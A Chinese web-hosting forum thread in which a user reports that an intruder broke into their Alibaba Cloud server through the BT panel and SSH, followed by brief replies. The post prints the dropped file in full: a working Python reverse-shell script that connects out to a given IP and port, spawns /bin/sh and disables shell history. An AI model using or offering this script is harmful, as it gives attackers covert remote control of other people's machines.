全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 2042|回复: 5

有台阿里云被疑似论坛MJJ的人给爆破了 @modianxia

[复制链接]
发表于 2017-1-20 10:11:06 | 显示全部楼层 |阅读模式
难道是宝塔的bug?
他先登陆了宝塔 然后建了个b.py
但是宝塔我都更改了默认用户名的 他还是用admin登陆成功了
然后登陆了ssh 我正准备睡觉呢 收到了阿里云的通知 我就先关机了
py内容

  1. # -*- coding:utf-8 -*-
  2. #!/usr/bin/env python
  3. """
  4. back connect py version,only linux have pty module
  5. code by google security team
  6. """
  7. import sys,os,socket,pty
  8. shell = "/bin/sh"
  9. def usage(name):
  10.     print 'python reverse connector'
  11.     print 'usage: %s <ip_addr> <port>' % name

  12. def main():
  13.     if len(sys.argv) < 3:
  14.         usage(sys.argv[0])
  15.         sys.exit()
  16.     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  17.     try:
  18.         if sys.argv[3] == 'udp' :
  19.             s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  20.     except:pass
  21.     try:
  22.         s.connect((sys.argv[1],int(sys.argv[2])))
  23.         print 'connect ok'
  24.     except:
  25.         print 'connect faild'
  26.         sys.exit()
  27.     os.dup2(s.fileno(),0)
  28.     os.dup2(s.fileno(),1)
  29.     os.dup2(s.fileno(),2)
  30.     global shell
  31.     os.unsetenv("HISTFILE")
  32.     os.unsetenv("HISTFILESIZE")
  33.     os.unsetenv("HISTSIZE")
  34.     os.unsetenv("HISTORY")
  35.     os.unsetenv("HISTSAVE")
  36.     os.unsetenv("HISTZONE")
  37.     os.unsetenv("HISTLOG")
  38.     os.unsetenv("HISTCMD")
  39.     os.putenv("HISTFILE",'/dev/null')
  40.     os.putenv("HISTSIZE",'0')
  41.     os.putenv("HISTFILESIZE",'0')
  42.     pty.spawn(shell)
  43.     s.close()

  44. if __name__ == '__main__':
  45.     main()
复制代码

阿里云
loc.jpg (15.63 KB, 下载次数: 2)
发表于 2017-1-20 10:22:28 | 显示全部楼层
是哪个mjj这么厉害
发表于 2017-1-20 13:58:40 | 显示全部楼层
楼下对此事负责
发表于 2017-1-20 14:08:24 | 显示全部楼层
宝塔用完了我一般都是删面板..
发表于 2017-1-20 16:07:28 | 显示全部楼层
测试到mjj的机器了,哈哈
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-5-9 14:45 , Processed in 0.074052 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表